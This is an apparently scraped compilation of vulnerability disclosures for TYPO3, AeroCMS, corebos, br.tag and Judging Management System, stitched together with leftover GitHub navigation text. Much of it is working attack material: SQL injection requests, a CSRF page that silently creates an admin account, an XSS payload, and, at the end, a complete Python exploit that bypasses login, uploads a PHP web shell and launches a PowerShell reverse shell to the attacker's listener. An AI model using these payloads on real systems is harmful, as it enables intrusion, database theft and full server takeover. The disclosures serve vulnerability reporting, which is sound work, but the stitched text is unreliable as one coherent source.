### Problem
Due to the lack of separating user-submitted data from the internal configuration in the Form Designer backend module, it was possible to inject code instructions to be processed and executed via TypoScript as PHP code.

The existence of individual TypoScript instructions for a particular form item (known as [`formDefinitionOverrides`](https://docs.typo3.org/c/typo3/cms-form/main/en-us/I/Concepts/FrontendRendering/Index.html#form-element-properties)) and a valid backend user account with access to the form module are needed to exploit this vulnerability.

### Solution
Update to TYPO3 versions 8.7.49 ELTS, 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1 that fix the problem described above.

### References
* [TYPO3-CORE-SA-2022-015](https://typo3.org/security/advisory/typo3-core-sa-2022-015)


**Problem**

Due to the lack of separating user-submitted data from the internal configuration in the Form Designer backend module, it was possible to inject code instructions to be processed and executed via TypoScript as PHP code.

The existence of individual TypoScript instructions for a particular form item (known as formDefinitionOverrides) and a valid backend user account with access to the form module are needed to exploit this vulnerability.

**Solution**

Update to TYPO3 versions 8.7.49 ELTS, 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1 that fix the problem described above.

**References**

*   TYPO3-CORE-SA-2022-015

**References**

*   GHSA-c5wx-6c2c-f7rm
*   TYPO3/typo3@1302e88
*   https://typo3.org/security/advisory/typo3-core-sa-2022-015

GHSA-c5wx-6c2c-f7rm: TYPO3 CMS vulnerable to Arbitrary Code Execution via Form Framework

The approve parameter from the AeroCMS-v0.0.1 CMS system is vulnerable to SQL injection attacks.

Permalink

Cannot retrieve contributors at this time

**view\_all\_comments\_update**

The approve parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Comments -> Approve.

**Exploit**

Query out the current user

**Vulnerable Code**

    admin/includes/view_all_comments.php
    

The approve parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    UPDATE comments SET comment_status = 'approved' WHERE comment_id = 3 and extractvalue(0,concat(0x7e,user())) LIMIT 1
    

**POC**

*   Injection Point

    approve=3+and+extractvalue(0,concat(0x7e,user()))
    

*   Request

    GET /AeroCMS-0.0.1/admin/comments.php?approve=3+and+extractvalue(0,concat(0x7e,user())) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/comments.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46051: CVE/view_all_comments_update.MD at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to Cross Site Request Forgery (CSRF).

Permalink

Cannot retrieve contributors at this time

**add\_user\_csrf****Description**

AeroCMS v0.0.1 has a vulnerability, Cross-site request forgery(CSRF). This vulnerability may cause the modification of personal information such as administrator password. To exploit this vulnerability, a constructed HTML file needs to be opened.

**Exploit**

1、Login to admin panel -> Users -> Add User.

2.  Build a request package to add administrator information.

<html\>
  <!\-- CSRF PoC \- generated by Burp Suite Professional \--\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <script\>
      function submitRequest()
      {
        var xhr \= new XMLHttpRequest();
        xhr.open("POST", "http:\\/\\/localhost\\/AeroCMS-0.0.1\\/admin\\/users.php?source=add\_user", true);
        xhr.setRequestHeader("Content-Type", "multipart\\/form-data; boundary=----WebKitFormBoundarydLYE4lYNAM12hDqt");
        xhr.setRequestHeader("Accept", "text\\/html,application\\/xhtml+xml,application\\/xml;q=0.9,image\\/avif,image\\/webp,image\\/apng,\*\\/\*;q=0.8,application\\/signed-exchange;v=b3;q=0.9");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
        xhr.withCredentials \= true;
        var body \= "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"username\\"\\r\\n" + 
          "\\r\\n" + 
          "111111\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"password\\"\\r\\n" + 
          "\\r\\n" + 
          "111111\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_firstname\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_lastname\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_email\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_image\\"; filename=\\"\\"\\r\\n" + 
          "Content-Type: application/octet-stream\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_role\\"\\r\\n" + 
          "\\r\\n" + 
          "Admin\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"create\_user\\"\\r\\n" + 
          "\\r\\n" + 
          "Add User\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt--\\r\\n";
        var aBody \= new Uint8Array(body.length);
        for (var i \= 0; i < aBody.length; i++)
          aBody\[i\] \= body.charCodeAt(i); 
        xhr.send(new Blob(\[aBody\]));
      }
    </script\>
    <form action\="#"\>
      <input type\="button" value\="Submit request" onclick\="submitRequest();" /\>
    </form\>
  </body\>
</html\>

3.View that there are currently only two users

4.Click on the constructed web page.

5.The new administrator account was successfully added

CVE-2022-46059: CVE/add_user_csrf.md at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to SQL Injection via the delete parameter.

**categories\_delete\_sql\_injection**

The delete parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Categories-> Delete.

**Exploit**

The first character of the current database is ord('a'), which is chr(97), delay

**Vulnerable Code**

    AeroCMS-0.0.1\admin\categories.php
    

Use the deleteCategories() function

Traced to the 'admin/functions.php' file

The delete parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    DELETE FROM categories WHERE cat_id = 3 RLIKE (SELECT 5646 FROM (SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))=97,3,0)))))XOyv) LIMIT 1
    

**POC**

*   Injection Point

    delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv)
    

*   Request

    GET /AeroCMS-0.0.1/admin/categories.php?delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46047: CVE/categories_delete_sql_injection.md at master · rdyx0/CVE

AeroCMS v0.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

Permalink

Cannot retrieve contributors at this time

**add\_post\_post\_content**

AeroCMS v0.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via add\_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

**Step to Reproduct**

*   Login to admin panel -> Posts -> Add Posts -> Post Content -> inject payload <img/src/onerror=prompt(1)> -> The XSS will trigger when clicked Publish Post button

**Exploit**

Bypass escaping needs to be submitted using the Burp Suite

Click the View Post for the new submission

CVE-2022-46058: CVE/add_post_post_content.md at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to ClickJacking.

Permalink

**registration\_ClickJacking****Description**

AeroCMS v0.0.1 is vulnerable to ClickJacking.Attackers can use this vulnerability to deceive users to click, causing losses to individuals and platforms.

**Exploit**

1、The following takes registration.php as an example

To detect whether there is a ClickJacking vulnerability, here we find that the response packet does not contain the X-Frame-Options: deny field, then we can construct an HTML file locally and use an iframe to include this page

<html\>
<head\>
<title\>Clickjacking</title\>
</head\>
<body\>
<iframe src\="http://localhost/AeroCMS-0.0.1/registration.php" width\="900" height\="700" /\>
</body\>
</html\>

We can successfully load this page

CVE-2022-46061: CVE/registration_ClickJacking.md at master · rdyx0/CVE

PHP Remote File Inclusion in GitHub repository tsolucio/corebos prior to 8.0.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-4446: chore(Migration) delete obsolete migration files · tsolucio/corebos@8035e72

A vulnerability was found in ipti br.tag. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.13.0 is able to address this issue. The name of the patch is 7e311be22d3a0a1b53e61cb987ba13d681d85f06. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215431.

@@ -1,4 +1,4 @@ $('#save\_button').click(function() { $('#save\_button').click(function() { $('#quiz-form').submit(); });  
@@ -9,10 +9,10 @@ $('#delete\_button').click(function() { var action \= 'index.php?' + (url.indexOf("update") \== \-1 ? url.replace('create','delete') : url.replace('update','delete')); $('#quiz-form').attr('action', action); $('#quiz-form').submit(); } } });  
$('#save\_group\_button').click(function() { $('#save\_group\_button').click(function() { $('#group-form').submit(); });  
@@ -23,10 +23,10 @@ $('#delete\_group\_button').click(function() { var action \= 'index.php?' + (url.indexOf("update") \== \-1 ? url.replace('create','delete') : url.replace('update','delete')); $('#group-form').attr('action', action); $('#group-form').submit(); } } });  
$('#save\_question\_group\_button').click(function() { $('#save\_question\_group\_button').click(function() { $('#questiongroup-form').submit(); });  
@@ -37,11 +37,11 @@ $('#delete\_question\_group\_button').click(function() { var action \= 'index.php?' + (url.indexOf("update") \== \-1 ? url.replace('create','delete') : url.replace('update','delete')); $('#questiongroup-form').attr('action', action); $('#questiongroup-form').submit(); } } });  
  
$('#save\_question\_button').click(function() { $('#save\_question\_button').click(function() { $('#question-form').submit(); });  
@@ -52,10 +52,10 @@ $('#delete\_question\_button').click(function() { var action \= 'index.php?' + (url.indexOf("update") \== \-1 ? url.replace('create','delete') : url.replace('update','delete')); $('#question-form').attr('action', action); $('#question-form').submit(); } } });  
$('#save\_answer\_button').click(function() { $('#save\_answer\_button').click(function() { $('#answer-form').submit(); });  
@@ -80,6 +80,9 @@ var Option = function(){ contentType: "application/json; charset=utf-8" }) .done(function(data){ data \= JSON.stringify(data); data \= DOMPurify.sanitize(data); data \= JSON.parse(data); if(typeof data.errorCode != 'undefined' && data.errorCode \== '0'){ var element \= $('<tr></tr>') .attr({'option-id': data.id, 'option-description': data.description, 'option-answer': data.answer, 'option-complement': data.complement}) @@ -109,6 +112,9 @@ var Option = function(){ contentType: "application/json; charset=utf-8" }) .done(function(data){ data \= JSON.stringify(data); data \= DOMPurify.sanitize(data); data \= JSON.parse(data); if(typeof data.errorCode != 'undefined' && data.errorCode \== '0'){ var elementActive \= container.find('tr\[option-id="'+data.id+'"\]'); var element \= $('<tr></tr>') @@ -235,12 +241,12 @@ var Option = function(){ else if(type \== 'radio'){ var partialUid \= uid.substring(0,(uid.length \-1)); var elementChecked \= $('input\[id^="'+partialUid+'"\]:checked');  
if(isChecked){ $('div\[id^="'+partialUid+'"\]').each(function(){ $(this).hide(); });  
$('input\[id^="'+partialUid+'"\]').each(function(){ if($(this).attr('type') \== 'text') $(this).prop('disabled',true); @@ -286,6 +292,9 @@ var QuizQuestion = function(){ contentType: "application/json; charset=utf-8" }) .done(function(data){ data \= JSON.stringify(data); data \= DOMPurify.sanitize(data); data \= JSON.parse(data); if(typeof data.errorCode != 'undefined' && data.errorCode \== '0'){ var element \= $('<tr></tr>') .attr({'key': data.quizId + '' + data.questionId, 'quiz-id': data.quizId, 'question-id': data.questionId, 'question-description': data.description})

CVE-2022-4444: Resolvido issues do XSS · ipti/br.tag@7e311be

Judging Management System version 1.0 a remote shell upload vulnerability.

    # Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP serverimport requests,argparse,re,time,base64import urllib.parsefrom colorama import (Fore as F,Back as B,Style as S)from bs4 import BeautifulSoupBANNER = """╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝"""def argsetup():    desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'    parser = argparse.ArgumentParser(description=desc)    parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)    args = parser.parse_args()    return args# Performs Auth bypass in order to get the admin cookiedef auth_bypass(args):    print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")    session = requests.Session()    loginUrl = f"{args.target}/login.php"    username = """' OR 1=1-- -"""    password = "randomvalue1234"    data = {'username': username, 'password': password}    login = session.post(loginUrl,verify=False,data=data)    admin_cookie = login.cookies['PHPSESSID']    print(F.GREEN+"[+] Admin cookies obtained !!!")    return admin_cookie# Checks if the file has been uploaded to /uploads directorydef check_file(args,cookie):    uploads_endpoint = f"{args.target}/uploads/"    cookies = {'PHPSESSID': f'{cookie}'}    req = requests.get(uploads_endpoint,verify=False,cookies=cookies)    soup = BeautifulSoup(req.text,features='html.parser')    files = soup.find_all("a")    for i in range (len(files)):        match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))        if match:            file = files[i].get('href')            print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)            return file                return Nonedef file_upload(args,cookie):    now = int(time.time())    endpoint = f"{args.target}/edit_organizer.php"    cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}    get_req = requests.get(endpoint,verify=False,cookies=cookies)    soup = BeautifulSoup(get_req.text,features='html.parser')    username = soup.find("input",{"name":"username"}).get('value')    admin_password = soup.find("input",{"id":"password"}).get('value')    print(F.GREEN + "[+] Admin username: " + username)    print(F.GREEN + "[+] Admin password: " + admin_password)            # Multi-part request    file_dict = {        'fname':(None,"Random"),        'mname':(None,"Random"),        'lname':(None,"Random"),        'email':(None,"ranom@mail.com"),        'pnum':(None,"014564343"),        'cname':(None,"Random"),        'caddress':(None,"Random"),        'ctelephone':(None,"928928392"),        'cemail':(None,"company@mail.com"),        'cwebsite':(None,"http://company.com"),        'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),        'username':(None,f"{admin_password}"),        'passwordx':(None,f"{admin_password}"),        'password2x':(None,f"{admin_password}"),        'password':(None,f"{admin_password}"),        'update':(None,"")    }        req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)def exploit(args,cookie,file):    payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """    uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"    cookies = {'PHPSESSID': f'{cookie}'}    print(F.GREEN + "\n[+] Enjoy your reverse shell ")    requests.get(uploads_endpoint,verify=False,cookies=cookies)                if __name__ == '__main__':    print(F.CYAN +  BANNER)    args = argsetup()    cookie=auth_bypass(args=args)    file_upload(args=args,cookie=cookie)    file_name=check_file(args=args,cookie=cookie)    if file_name is not None:        exploit(args=args,cookie=cookie,file=file_name)            else:        print(F.RED + "[!] File not found")

Judging Management System 1.0 Shell Upload

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Tag

#php